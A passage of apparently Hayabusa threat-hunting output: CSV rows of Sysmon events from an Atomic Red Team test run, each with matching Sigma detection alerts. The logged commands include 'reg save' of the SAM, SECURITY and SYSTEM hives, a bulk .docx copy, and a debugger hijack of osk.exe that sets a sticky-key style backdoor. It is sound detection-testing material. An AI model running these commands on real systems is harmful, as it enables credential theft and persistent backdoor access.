HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 